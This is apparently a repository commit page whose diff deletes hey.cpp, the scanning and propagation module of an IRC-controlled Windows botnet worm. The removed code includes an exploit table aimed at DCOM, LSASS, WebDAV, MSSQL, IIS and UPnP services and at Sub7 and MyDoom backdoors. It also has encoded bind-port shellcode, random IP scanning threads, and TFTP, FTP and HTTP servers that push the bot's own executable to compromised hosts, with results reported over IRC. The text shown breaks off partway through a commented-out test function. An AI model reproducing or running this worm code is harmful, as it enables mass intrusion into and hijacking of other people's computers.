Delete hey.cpp
Browse files
hey.cpp
DELETED
|
@@ -1,603 +0,0 @@
|
|
| 1 |
-
#include "includes.h"
|
| 2 |
-
#include "functions.h"
|
| 3 |
-
#include "externs.h"
|
| 4 |
-
|
| 5 |
-
// globals
|
| 6 |
-
ADVINFO advinfo[MAXTHREADS];
|
| 7 |
-
CRITICAL_SECTION CriticalSection;
|
| 8 |
-
|
| 9 |
-
EXPLOIT exploit[]={
|
| 10 |
-
#ifndef NO_WEBDAV
|
| 11 |
-
{"webdav", "WebDav", 80, webdav, 0, TRUE, FALSE},
|
| 12 |
-
#endif
|
| 13 |
-
#ifndef NO_NETBIOS
|
| 14 |
-
{"netbios", "NetBios", 139, NetBios, 0, FALSE, FALSE},
|
| 15 |
-
{"ntpass", "NTPass", 445, NetBios, 0, FALSE, FALSE},
|
| 16 |
-
#endif
|
| 17 |
-
#ifndef NO_DCOM
|
| 18 |
-
{"dcom135", "Dcom135", 135, dcom, 0, TRUE, FALSE},
|
| 19 |
-
{"dcom445", "Dcom445", 445, dcom, 0, TRUE, FALSE},
|
| 20 |
-
{"dcom1025", "Dcom1025", 1025, dcom, 0, TRUE, FALSE},
|
| 21 |
-
#endif
|
| 22 |
-
#ifndef NO_DCOM2
|
| 23 |
-
{"dcom2", "Dcom2", 135, dcom2, 0, TRUE, FALSE},
|
| 24 |
-
#endif
|
| 25 |
-
{"WksSvc", "WksSvc", 135, WksSvc, 0, TRUE, FALSE},
|
| 26 |
-
#ifndef NO_IIS5SSL
|
| 27 |
-
{"iis5ssl", "IIS5SSL", 443, IIS5SSL, 0, TRUE, FALSE},
|
| 28 |
-
#endif
|
| 29 |
-
#ifndef NO_MSSQL
|
| 30 |
-
{"mssql", "MSSQL", 1433, MSSQL, 0, TRUE, FALSE},
|
| 31 |
-
#endif
|
| 32 |
-
#ifndef NO_BEAGLE
|
| 33 |
-
{"beagle1", "Beagle1", 2745, Beagle, 0, FALSE, TRUE},
|
| 34 |
-
{"beagle2", "Beagle2", 2745, Beagle, 0, FALSE, TRUE},
|
| 35 |
-
#endif
|
| 36 |
-
#ifndef NO_MYDOOM
|
| 37 |
-
{"mydoom", "MyDoom", 3127, MyDoom, 0, FALSE, FALSE},
|
| 38 |
-
#endif
|
| 39 |
-
#ifndef NO_LSASS
|
| 40 |
-
{"lsass_445", "lsass_445", 445, lsass, 0, TRUE, TRUE},
|
| 41 |
-
{"lsass_135", "lsass_135", 135, lsass, 0, TRUE, TRUE},
|
| 42 |
-
{"lsass_139", "lsass_139", 139, lsass, 0, TRUE, TRUE},
|
| 43 |
-
#endif
|
| 44 |
-
#ifndef NO_LSASS2
|
| 45 |
-
{"lsass2", "lsass2", 445, lsass, 0, TRUE, TRUE},
|
| 46 |
-
#endif
|
| 47 |
-
#ifndef NO_OPTIX
|
| 48 |
-
{"optix", "Optix", 3140, Optix, 0, FALSE, FALSE},
|
| 49 |
-
#endif
|
| 50 |
-
#ifndef NO_UPNP
|
| 51 |
-
{"upnp", "UPNP", 5000, upnp, 0, FALSE, TRUE},
|
| 52 |
-
#endif
|
| 53 |
-
#ifndef NO_NETDEVIL
|
| 54 |
-
{"netdevil","NetDevil", 903, NetDevil, 0, FALSE, FALSE},
|
| 55 |
-
#endif
|
| 56 |
-
#ifndef NO_DAMEWARE
|
| 57 |
-
{"DameWare", "DameWare", 6129, DameWare, 0, FALSE, TRUE},
|
| 58 |
-
#endif
|
| 59 |
-
#ifndef NO_KUANG2
|
| 60 |
-
{"kuang2", "Kuang2", 17300, Kuang, 0, FALSE, FALSE},
|
| 61 |
-
#endif
|
| 62 |
-
#ifndef NO_SUB7
|
| 63 |
-
{"sub7", "Sub7", 27347, Sub7, 0, FALSE, FALSE},
|
| 64 |
-
#endif
|
| 65 |
-
{NULL, NULL, 0, NULL, 0, FALSE, FALSE}
|
| 66 |
-
};
|
| 67 |
-
|
| 68 |
-
SCANALL scanall[]={
|
| 69 |
-
{"lsass_445", true},
|
| 70 |
-
{"lsass2", true},
|
| 71 |
-
{"lsass_135", true},
|
| 72 |
-
{"lsass_139", true},
|
| 73 |
-
{"dcom135", true},
|
| 74 |
-
{NULL, false}
|
| 75 |
-
};
|
| 76 |
-
|
| 77 |
-
// credits to PhaTTy for this :)
|
| 78 |
-
char shellcode[] = //bind port 1981
|
| 79 |
-
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
|
| 80 |
-
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
|
| 81 |
-
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
|
| 82 |
-
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
|
| 83 |
-
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
|
| 84 |
-
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
|
| 85 |
-
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
|
| 86 |
-
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
|
| 87 |
-
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
|
| 88 |
-
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
|
| 89 |
-
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
|
| 90 |
-
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
|
| 91 |
-
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
|
| 92 |
-
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
|
| 93 |
-
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
|
| 94 |
-
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
|
| 95 |
-
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
|
| 96 |
-
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
|
| 97 |
-
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
|
| 98 |
-
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
|
| 99 |
-
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
|
| 100 |
-
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
|
| 101 |
-
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
|
| 102 |
-
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
|
| 103 |
-
"\xFA\xFA\xFC\xE9\xED\x99";
|
| 104 |
-
|
| 105 |
-
void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
|
| 106 |
-
{
|
| 107 |
-
char buffer[IRCLINE], buffer2[IRCLINE];
|
| 108 |
-
|
| 109 |
-
int extotal = 0;
|
| 110 |
-
|
| 111 |
-
sprintf(buffer, "[SCAN]: Exploit Statistics:");
|
| 112 |
-
for(int i=0; exploit[i].port != 0; i++) {
|
| 113 |
-
extotal += exploit[i].stats;
|
| 114 |
-
sprintf(buffer2," %s: %d,",exploit[i].name,exploit[i].stats);
|
| 115 |
-
strncat(buffer, buffer2, sizeof(buffer));
|
| 116 |
-
}
|
| 117 |
-
sprintf(buffer2, " Total: %d in %s.", extotal, Uptime(started));
|
| 118 |
-
strncat(buffer, buffer2, sizeof(buffer));
|
| 119 |
-
|
| 120 |
-
irc_privmsg(sock, chan, buffer, notice);
|
| 121 |
-
addlog(buffer);
|
| 122 |
-
|
| 123 |
-
return;
|
| 124 |
-
}
|
| 125 |
-
|
| 126 |
-
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
|
| 127 |
-
{
|
| 128 |
-
char sendbuf[IRCLINE];
|
| 129 |
-
|
| 130 |
-
if (findthreadid(SCAN_THREAD) > 0) {
|
| 131 |
-
IN_ADDR in;
|
| 132 |
-
in.s_addr = advinfo[threadnum].ip;
|
| 133 |
-
|
| 134 |
-
sprintf(sendbuf, "[SCAN]: Current IP: %s.",finet_ntoa(in));
|
| 135 |
-
} else
|
| 136 |
-
sprintf(sendbuf ,"[SCAN]: Scan not active.");
|
| 137 |
-
|
| 138 |
-
irc_privmsg(sock, chan, sendbuf, notice);
|
| 139 |
-
addlog(sendbuf);
|
| 140 |
-
|
| 141 |
-
return;
|
| 142 |
-
}
|
| 143 |
-
|
| 144 |
-
void CheckServers(ADVSCAN scan)
|
| 145 |
-
{
|
| 146 |
-
char sendbuf[IRCLINE];
|
| 147 |
-
|
| 148 |
-
DWORD id;
|
| 149 |
-
|
| 150 |
-
if(scan.exploit != -1) {
|
| 151 |
-
if (exploit[scan.exploit].tftp) {
|
| 152 |
-
#ifndef NO_TFTPD
|
| 153 |
-
if (findthreadid(TFTP_THREAD) == 0) {
|
| 154 |
-
static TFTP tftp;
|
| 155 |
-
tftp.port = tftpport;
|
| 156 |
-
tftp.threads = 0;
|
| 157 |
-
GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));
|
| 158 |
-
strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
|
| 159 |
-
tftp.sock=scan.sock;
|
| 160 |
-
tftp.notice = scan.notice;
|
| 161 |
-
if (scan.msgchan[0] == '\0') {
|
| 162 |
-
strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
|
| 163 |
-
tftp.silent = TRUE;
|
| 164 |
-
} else {
|
| 165 |
-
strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
|
| 166 |
-
tftp.silent = FALSE;
|
| 167 |
-
}
|
| 168 |
-
|
| 169 |
-
sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
|
| 170 |
-
tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
|
| 171 |
-
if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
|
| 172 |
-
while (tftp.gotinfo == FALSE)
|
| 173 |
-
Sleep(50);
|
| 174 |
-
} else
|
| 175 |
-
sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError());
|
| 176 |
-
|
| 177 |
-
addlog(sendbuf);
|
| 178 |
-
#endif
|
| 179 |
-
#ifndef NO_FTPD
|
| 180 |
-
//
|
| 181 |
-
static FTP ftp;
|
| 182 |
-
//ftp.port = FTP_PORT;
|
| 183 |
-
ftp.threads = 0;
|
| 184 |
-
GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
|
| 185 |
-
strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
|
| 186 |
-
ftp.sock=scan.sock;
|
| 187 |
-
ftp.notice = scan.notice;
|
| 188 |
-
if (scan.msgchan[0] == '\0') {
|
| 189 |
-
strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
|
| 190 |
-
ftp.silent = TRUE;
|
| 191 |
-
} else {
|
| 192 |
-
strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
|
| 193 |
-
ftp.silent = FALSE;
|
| 194 |
-
}
|
| 195 |
-
|
| 196 |
-
sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
|
| 197 |
-
ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
|
| 198 |
-
if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
|
| 199 |
-
while (ftp.gotinfo == FALSE)
|
| 200 |
-
Sleep(50);
|
| 201 |
-
} else
|
| 202 |
-
sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError());
|
| 203 |
-
|
| 204 |
-
addlog(sendbuf);
|
| 205 |
-
//
|
| 206 |
-
#endif
|
| 207 |
-
}
|
| 208 |
-
} else if (exploit[scan.exploit].http) {
|
| 209 |
-
if (findthreadid(HTTP_THREAD) == 0) {
|
| 210 |
-
static HTTPD httpd;
|
| 211 |
-
|
| 212 |
-
char *c;
|
| 213 |
-
GetModuleFileName(0,httpd.dir,sizeof(httpd.dir));
|
| 214 |
-
if ((c=strrchr(httpd.dir,'\\')) != NULL)
|
| 215 |
-
*c='\0';
|
| 216 |
-
httpd.port = httpport;
|
| 217 |
-
httpd.enabled = FALSE;
|
| 218 |
-
sprintf(httpd.chan, scan.chan);
|
| 219 |
-
httpd.sock = scan.sock;
|
| 220 |
-
httpd.notice = scan.notice;
|
| 221 |
-
httpd.silent = scan.silent;
|
| 222 |
-
|
| 223 |
-
sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir);
|
| 224 |
-
|
| 225 |
-
httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL);
|
| 226 |
-
if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) {
|
| 227 |
-
while(httpd.info == FALSE)
|
| 228 |
-
Sleep(50);
|
| 229 |
-
} else
|
| 230 |
-
sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError());
|
| 231 |
-
|
| 232 |
-
addlog(sendbuf);
|
| 233 |
-
}
|
| 234 |
-
}
|
| 235 |
-
}
|
| 236 |
-
|
| 237 |
-
return;
|
| 238 |
-
}
|
| 239 |
-
|
| 240 |
-
unsigned long AdvGetNextIP(int threadnum)
|
| 241 |
-
{
|
| 242 |
-
DWORD host;
|
| 243 |
-
|
| 244 |
-
memcpy(&host, &advinfo[threadnum].ip, 4);
|
| 245 |
-
host = fntohl(host);
|
| 246 |
-
host += 1;
|
| 247 |
-
host = fhtonl(host);
|
| 248 |
-
memcpy(&advinfo[threadnum].ip, &host, 4);
|
| 249 |
-
|
| 250 |
-
return (advinfo[threadnum].ip);
|
| 251 |
-
}
|
| 252 |
-
|
| 253 |
-
unsigned long AdvGetNextIPRandom(char *scanmask, int threadnum)
|
| 254 |
-
{
|
| 255 |
-
int ip1=-1,ip2=-1,ip3=-1,ip4=-1;
|
| 256 |
-
|
| 257 |
-
if (strlen(scanmask) > 15)
|
| 258 |
-
return 0;
|
| 259 |
-
|
| 260 |
-
sscanf(scanmask,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
|
| 261 |
-
if (ip1==-1) ip1=rand();
|
| 262 |
-
if (ip2==-1) ip2=rand();
|
| 263 |
-
if (ip3==-1) ip3=rand();
|
| 264 |
-
if (ip4==-1) ip4=rand();
|
| 265 |
-
|
| 266 |
-
advinfo[threadnum].ip = (ip1+(ip2<<8)+(ip3<<16)+(ip4<<24));
|
| 267 |
-
|
| 268 |
-
return (advinfo[threadnum].ip);
|
| 269 |
-
}
|
| 270 |
-
|
| 271 |
-
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
|
| 272 |
-
{
|
| 273 |
-
SOCKADDR_IN sin;
|
| 274 |
-
unsigned long blockcmd=1;
|
| 275 |
-
|
| 276 |
-
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
|
| 277 |
-
if (sock == INVALID_SOCKET)
|
| 278 |
-
return FALSE;
|
| 279 |
-
|
| 280 |
-
sin.sin_family = AF_INET;
|
| 281 |
-
sin.sin_addr.S_un.S_addr = ip;
|
| 282 |
-
sin.sin_port = fhtons((unsigned short)port);
|
| 283 |
-
fioctlsocket(sock,FIONBIO,&blockcmd);
|
| 284 |
-
fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
|
| 285 |
-
|
| 286 |
-
TIMEVAL timeout;
|
| 287 |
-
timeout.tv_sec=delay;
|
| 288 |
-
timeout.tv_usec=0;
|
| 289 |
-
FD_SET rset;
|
| 290 |
-
FD_ZERO(&rset);
|
| 291 |
-
FD_SET(sock,&rset);
|
| 292 |
-
|
| 293 |
-
int i = fselect(0,0,&rset,0,&timeout);
|
| 294 |
-
fclosesocket(sock);
|
| 295 |
-
|
| 296 |
-
if (i<=0)
|
| 297 |
-
return FALSE;
|
| 298 |
-
else
|
| 299 |
-
return TRUE;
|
| 300 |
-
}
|
| 301 |
-
|
| 302 |
-
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
|
| 303 |
-
{
|
| 304 |
-
char buffer[LOGLINE];
|
| 305 |
-
int size;
|
| 306 |
-
|
| 307 |
-
unsigned short src_port = 9801;
|
| 308 |
-
|
| 309 |
-
TCPHEADER2 send_tcp;
|
| 310 |
-
send_tcp.source = fhtons(src_port);
|
| 311 |
-
send_tcp.dest = fhtons((unsigned short)port);
|
| 312 |
-
send_tcp.seq = rand();
|
| 313 |
-
send_tcp.ack_seq = 0;
|
| 314 |
-
send_tcp.res1 = 0;
|
| 315 |
-
send_tcp.res2 = 0;
|
| 316 |
-
send_tcp.doff = 5;
|
| 317 |
-
send_tcp.fin = 0;
|
| 318 |
-
send_tcp.syn = 1; /*This is the important part..;) */
|
| 319 |
-
send_tcp.rst = 0;
|
| 320 |
-
send_tcp.psh = 0;
|
| 321 |
-
send_tcp.ack = 0;
|
| 322 |
-
send_tcp.urg = 0;
|
| 323 |
-
send_tcp.window = fhtons(512);
|
| 324 |
-
send_tcp.check = 0;
|
| 325 |
-
send_tcp.urg_ptr = 0;
|
| 326 |
-
|
| 327 |
-
PSDHEADER psdheader;
|
| 328 |
-
psdheader.saddr = src_ip;
|
| 329 |
-
psdheader.daddr = dest_ip;
|
| 330 |
-
psdheader.zero = 0;
|
| 331 |
-
psdheader.proto = IPPROTO_TCP;
|
| 332 |
-
psdheader.length = fhtons(sizeof(send_tcp));
|
| 333 |
-
|
| 334 |
-
memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
|
| 335 |
-
send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
|
| 336 |
-
|
| 337 |
-
SOCKADDR_IN ssin;
|
| 338 |
-
memset(&ssin,0,sizeof(ssin));
|
| 339 |
-
ssin.sin_family = AF_INET;
|
| 340 |
-
ssin.sin_port = fhtons((unsigned short)port);
|
| 341 |
-
ssin.sin_addr.s_addr = dest_ip;
|
| 342 |
-
int ssin_len = sizeof(ssin);
|
| 343 |
-
|
| 344 |
-
SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
|
| 345 |
-
if (tcp_sock == INVALID_SOCKET) {
|
| 346 |
-
addlog("socket open failed");
|
| 347 |
-
return FALSE;
|
| 348 |
-
}
|
| 349 |
-
|
| 350 |
-
// 10022: WSAEINVAL - An invalid argument was supplied.
|
| 351 |
-
if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
|
| 352 |
-
sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
|
| 353 |
-
addlog(buffer);
|
| 354 |
-
fclosesocket(tcp_sock);
|
| 355 |
-
return FALSE;
|
| 356 |
-
}
|
| 357 |
-
|
| 358 |
-
RECVHEADER recv_tcp;
|
| 359 |
-
memset (&recv_tcp,'\0',sizeof(recv_tcp));
|
| 360 |
-
while (recv_tcp.tcp.dest != src_port) {
|
| 361 |
-
if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
|
| 362 |
-
addlog("recvfrom() socket failed");
|
| 363 |
-
fclosesocket(tcp_sock);
|
| 364 |
-
return FALSE;
|
| 365 |
-
}
|
| 366 |
-
}
|
| 367 |
-
|
| 368 |
-
fclosesocket(tcp_sock);
|
| 369 |
-
if (recv_tcp.tcp.syn == 1) {
|
| 370 |
-
addlog("Socket open.");
|
| 371 |
-
|
| 372 |
-
return TRUE;
|
| 373 |
-
} else {
|
| 374 |
-
addlog("Socket closed.");
|
| 375 |
-
return FALSE;
|
| 376 |
-
}
|
| 377 |
-
}
|
| 378 |
-
|
| 379 |
-
DWORD WINAPI AdvPortScanner(LPVOID param)
|
| 380 |
-
{
|
| 381 |
-
IN_ADDR in;
|
| 382 |
-
char logbuf[LOGLINE];
|
| 383 |
-
|
| 384 |
-
ADVSCAN scan = *((ADVSCAN *)param);
|
| 385 |
-
ADVSCAN *scanp = (ADVSCAN *)param;
|
| 386 |
-
scanp->cgotinfo = TRUE;
|
| 387 |
-
|
| 388 |
-
int threadnum=scan.cthreadnum;
|
| 389 |
-
int threadid=scan.cthreadid;
|
| 390 |
-
|
| 391 |
-
srand(GetTickCount());
|
| 392 |
-
while (advinfo[threads[threadnum].parent].info) {
|
| 393 |
-
DWORD dwIP;
|
| 394 |
-
|
| 395 |
-
if (scan.random)
|
| 396 |
-
dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
|
| 397 |
-
else
|
| 398 |
-
dwIP = AdvGetNextIP(threads[threadnum].parent);
|
| 399 |
-
in.s_addr = dwIP;
|
| 400 |
-
|
| 401 |
-
sprintf(logbuf,"[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
|
| 402 |
-
finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
|
| 403 |
-
sprintf(threads[threadnum].name, logbuf);
|
| 404 |
-
|
| 405 |
-
if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
|
| 406 |
-
//if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
|
| 407 |
-
if (scan.exploit == -1) {
|
| 408 |
-
EnterCriticalSection(&CriticalSection);
|
| 409 |
-
|
| 410 |
-
sprintf(logbuf,"[SCAN]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
|
| 411 |
-
if (!scan.silent) {
|
| 412 |
-
if (scan.msgchan[0] != '\0')
|
| 413 |
-
irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
|
| 414 |
-
else
|
| 415 |
-
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
|
| 416 |
-
}
|
| 417 |
-
addlog(logbuf);
|
| 418 |
-
|
| 419 |
-
LeaveCriticalSection(&CriticalSection);
|
| 420 |
-
} else {
|
| 421 |
-
EXINFO exinfo;
|
| 422 |
-
|
| 423 |
-
sprintf(exinfo.ip, finet_ntoa(in));
|
| 424 |
-
sprintf(exinfo.command, exploit[scan.exploit].command);
|
| 425 |
-
if (scan.msgchan[0] != '\0')
|
| 426 |
-
sprintf(exinfo.chan, scan.msgchan);
|
| 427 |
-
else
|
| 428 |
-
sprintf(exinfo.chan, scan.chan);
|
| 429 |
-
exinfo.sock = scan.sock;
|
| 430 |
-
exinfo.notice = scan.notice;
|
| 431 |
-
exinfo.silent = scan.silent;
|
| 432 |
-
exinfo.port = scan.port;
|
| 433 |
-
exinfo.threadnum = threadnum;
|
| 434 |
-
exinfo.exploit = scan.exploit;
|
| 435 |
-
exploit[scan.exploit].exfunc(exinfo);
|
| 436 |
-
/*if (exploit[scan.exploit].exfunc(exinfo)) {
|
| 437 |
-
EnterCriticalSection(&CriticalSection);
|
| 438 |
-
|
| 439 |
-
sprintf(logbuf,"[SCAN]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
|
| 440 |
-
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
|
| 441 |
-
addlog(logbuf);
|
| 442 |
-
|
| 443 |
-
LeaveCriticalSection(&CriticalSection);
|
| 444 |
-
} else {
|
| 445 |
-
EnterCriticalSection(&CriticalSection);
|
| 446 |
-
|
| 447 |
-
sprintf(logbuf,"[SCAN]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
|
| 448 |
-
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
|
| 449 |
-
addlog(logbuf);
|
| 450 |
-
|
| 451 |
-
LeaveCriticalSection(&CriticalSection);
|
| 452 |
-
}*/
|
| 453 |
-
|
| 454 |
-
}
|
| 455 |
-
}
|
| 456 |
-
Sleep(2000);
|
| 457 |
-
}
|
| 458 |
-
clearthread(threadnum);
|
| 459 |
-
|
| 460 |
-
ExitThread(0);
|
| 461 |
-
}
|
| 462 |
-
|
| 463 |
-
DWORD WINAPI AdvScanner(LPVOID param)
|
| 464 |
-
{
|
| 465 |
-
char buffer[LOGLINE];
|
| 466 |
-
//char szSelfExe[MAX_PATH];
|
| 467 |
-
|
| 468 |
-
ADVSCAN scan = *((ADVSCAN *)param);
|
| 469 |
-
ADVSCAN *scanp = (ADVSCAN *)param;
|
| 470 |
-
scanp->gotinfo = TRUE;
|
| 471 |
-
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
|
| 472 |
-
/*
|
| 473 |
-
// FIX ME: Make this a standalone function
|
| 474 |
-
if (!FileExists(szLocalPayloadFile)) {
|
| 475 |
-
GetModuleFileName(0,szSelfExe,MAX_PATH);
|
| 476 |
-
CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
|
| 477 |
-
// FIX ME: Make this copy to the same directory (could affect other stuff)
|
| 478 |
-
}
|
| 479 |
-
*/
|
| 480 |
-
CheckServers(scan);
|
| 481 |
-
|
| 482 |
-
if (findthreadid(SCAN_THREAD) == 1) {
|
| 483 |
-
DeleteCriticalSection(&CriticalSection); // just in case
|
| 484 |
-
|
| 485 |
-
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
|
| 486 |
-
// failed to initialize CriticalSection
|
| 487 |
-
sprintf(buffer,"[SCAN]: Failed to initialize critical section.");
|
| 488 |
-
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
|
| 489 |
-
addlog(buffer);
|
| 490 |
-
|
| 491 |
-
return 0;
|
| 492 |
-
}
|
| 493 |
-
}
|
| 494 |
-
|
| 495 |
-
advinfo[scan.threadnum].info = TRUE;
|
| 496 |
-
for (unsigned int i=1;i<=(scan.threads);i++) {
|
| 497 |
-
scan.cthreadid = i;
|
| 498 |
-
sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
|
| 499 |
-
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
|
| 500 |
-
threads[scan.cthreadnum].parent = scan.threadnum;
|
| 501 |
-
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
|
| 502 |
-
while (scan.cgotinfo == FALSE)
|
| 503 |
-
Sleep(30);
|
| 504 |
-
} else {
|
| 505 |
-
sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError());
|
| 506 |
-
addlog(buffer);
|
| 507 |
-
}
|
| 508 |
-
|
| 509 |
-
Sleep(30);
|
| 510 |
-
}
|
| 511 |
-
|
| 512 |
-
if (scan.minutes != 0)
|
| 513 |
-
Sleep(60000*scan.minutes);
|
| 514 |
-
else
|
| 515 |
-
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
|
| 516 |
-
|
| 517 |
-
IN_ADDR in;
|
| 518 |
-
in.s_addr = advinfo[scan.threadnum].ip;
|
| 519 |
-
sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
|
| 520 |
-
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
|
| 521 |
-
addlog(buffer);
|
| 522 |
-
|
| 523 |
-
advinfo[scan.threadnum].info = FALSE;
|
| 524 |
-
Sleep(3000);
|
| 525 |
-
|
| 526 |
-
if (findthreadid(SCAN_THREAD) == 1)
|
| 527 |
-
DeleteCriticalSection(&CriticalSection);
|
| 528 |
-
|
| 529 |
-
clearthread(scan.threadnum);
|
| 530 |
-
|
| 531 |
-
ExitThread(0);
|
| 532 |
-
}
|
| 533 |
-
|
| 534 |
-
/* -- test code xwarlordx
|
| 535 |
-
DWORD WINAPI ADVHttpdScanner(EXINFO exinfo)
|
| 536 |
-
{
|
| 537 |
-
char target[512],request[1024],*start,buffer[1024];
|
| 538 |
-
SOCKET sSock;
|
| 539 |
-
SOCKADDR_IN sin;
|
| 540 |
-
DWORD nb;
|
| 541 |
-
fd_set fd_struct;
|
| 542 |
-
timeval timeout = {1, 0};
|
| 543 |
-
unsigned int n,d;
|
| 544 |
-
|
| 545 |
-
strcpy(target, (char *)exinfo.ip);
|
| 546 |
-
sprintf(request, "GET HTTP/1.1\r\nConnection: Keep-Alive Accept\r\n\r\n");
|
| 547 |
-
sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
| 548 |
-
sin.sin_family = AF_INET;
|
| 549 |
-
sin.sin_port = fhtons(exinfo.port);
|
